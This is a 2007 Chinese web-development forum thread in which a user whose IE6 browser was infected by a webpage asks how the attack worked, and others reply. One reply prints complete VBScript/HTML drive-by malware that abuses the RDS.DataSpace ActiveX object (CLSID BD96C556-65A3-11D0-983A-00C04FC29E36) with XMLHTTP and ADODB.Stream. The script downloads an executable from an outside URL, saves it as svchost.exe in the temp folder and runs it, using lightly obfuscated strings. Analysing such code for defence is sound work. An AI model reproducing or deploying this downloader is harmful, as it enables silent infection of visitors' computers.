请高手分析一下这个网站用了IE的什么漏洞传播病毒的?

eastnofail 2007-08-02 07:24:28
今天google一个东西,然后开这个网页:http://www.chmhome.com/technology/program-design/soft/20070707/81305.html
发现有点慢,鼠标也有点闪,好像在执行什么东西似的,心想坏了,于是赶紧按下复位键,没想到结果还是中招了,后来我查看了临时目录下的文件,发现打开该网页的时候,下载了一个BAT文件、一个vbs脚本和一个木马,vbs脚本负责运行该木马和批处理,我的浏览器(IE6 SP1)权限都是默认级别的,按道理远程用户是没有权限执行这些操作的,那么他能够把病毒下载到我的机器上并且执行,那就肯定是利用了什么漏洞,我用flashget把这个页面的源代码下载下来了,并且跟踪了里面的一些script,但是本人水平有限,目前还没有发现他们是如何利用漏洞的,所以在此请教各位一起帮忙分析一下,(纯属学习目的,本人极度痛恨制作木马病毒的这帮鸟人,明白原理之后也会知道怎么应付)。谢谢!
...全文
407 15 打赏 收藏 转发到动态 举报
写回复
用AI写文章
15 条回复
切换为时间正序
请发表友善的回复…
发表回复
chaircat 2007-08-17
  • 打赏
  • 举报
回复
ls的ls...
用的是这一个组件"BD96C556-65A3-11D0-983A-00C04FC29E36"
很经典的一个利用...
shuangbaby 2007-08-17
  • 打赏
  • 举报
回复
可以禁用fso组件等措施来防御
shuangbaby 2007-08-17
  • 打赏
  • 举报
回复
发一个我以前截获的一个病毒源代码:主要利用 adodb.stream、xmlhttp、fso等来下病毒并执行exe..

<html>
<body>
<script type="text/jscript">
function init () {
document.write("<center><font color=red></font><center>");}
window.onload = init;
</script>
<script language="VBScript">
on error resume next
tcsafe = "http://www.123.com/1.exe" //这个是病毒
m1="object"
m2="classid"
m3="clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
m4="Microsoft.XMLHTTP"
m5="Shell.Application"
m6="Scripting.FileSystemObject"
sub tcsafe1exe(m5,X9)
set Xe = Xc.createobject(m5,"")
dd="open"
Xe.ShellExecute X9,BBS,BBS,dd,0
end sub
Set Xc = document.createElement(m1)
Xc.setAttribute m2, m3
Xi=m4
Set Xd = Xc.CreateObject(Xi,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
a5=a1&a2&a3&a4
Xg=a5
set Xa = Xc.createobject(Xg,"")
Xa.type = 1
Xh="GET"
Xd.Open Xh, tcsafe, False
Xd.Send
X9="svchost.exe"
set Xb = Xc.createobject(m6,"")
set Xe = Xb.GetSpecialFolder(2)
Xa.open
dd="Xa.BuildPath(Xa,X8)"
X8=dd
d1="Xb.BuildPath(Xb,X7)"
X7=d1
d2="Xc.BuildPath(Xd,X6)"
X6=d2
d3="Xd.BuildPath(Xf,X5)"
X5=d3
d4="Xe.BuildPath(Xg,X4)"
X4=d4
d5="Xf.BuildPath(Xh,X4)"
X3=d5
d6="Xg.BuildPath(Xi,X3)"
X2=d6
d7="Xh.BuildPath(Xg,X1)"
X1=d7
d8="Xi.BuildPath(Xk,X0)"
X0=d8
X9= Xb.BuildPath(Xe,X9)
Xa.write Xd.responseBody
Xa.savetofile X9,2
Xa.close
call tcsafe1exe(m5,X9)
</script>
</body>
</html>
gameboy766 2007-08-17
  • 打赏
  • 举报
回复
MARK
chaircat 2007-08-16
  • 打赏
  • 举报
回复
看了半天没发现可以物体啊...
eastnofail 2007-08-16
  • 打赏
  • 举报
回复
to楼上,我只是想知道原因,我不是怕染上病毒
ericloot 2007-08-16
  • 打赏
  • 举报
回复
偷偷下载在自动运行好像不一定要通过ie漏洞吧.
eastnofail 2007-08-06
  • 打赏
  • 举报
回复
楼上的,谢谢你的回复,不过上面那个地方讲的太浅显了,我想编一个vbs脚本病毒很多人都会,
最大的问题是当用户访问你的网站的时候,你怎么搞到权限把这个vbs写在用户的硬盘上,并且运行这个脚本。
ssssssssssss 2007-08-06
  • 打赏
  • 举报
回复
FSO/ActiveX?
用Firefox吧。
hij333 2007-08-06
  • 打赏
  • 举报
回复
MARK
huo789 2007-08-03
  • 打赏
  • 举报
回复
参考:http://www.number87.com/computer/net/074136524005-k69q0301.htm
huo789 2007-08-03
  • 打赏
  • 举报
回复
UP~
mh_rock 2007-08-03
  • 打赏
  • 举报
回复
up..
youufis 2007-08-02
  • 打赏
  • 举报
回复
http://www.chmhome.com/technology/program-design/soft/20070707/81305.html
打开这个网页,没什么问题。
emptyness 2007-08-02
  • 打赏
  • 举报
回复
这样的网站多了...没办法....

如果带病毒的话,google的搜索貌似会提醒的....

不懂 帮顶了....

87,903

社区成员

发帖
与我相关
我的任务
社区描述
Web 开发 JavaScript
社区管理员
  • JavaScript
  • 无·法
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧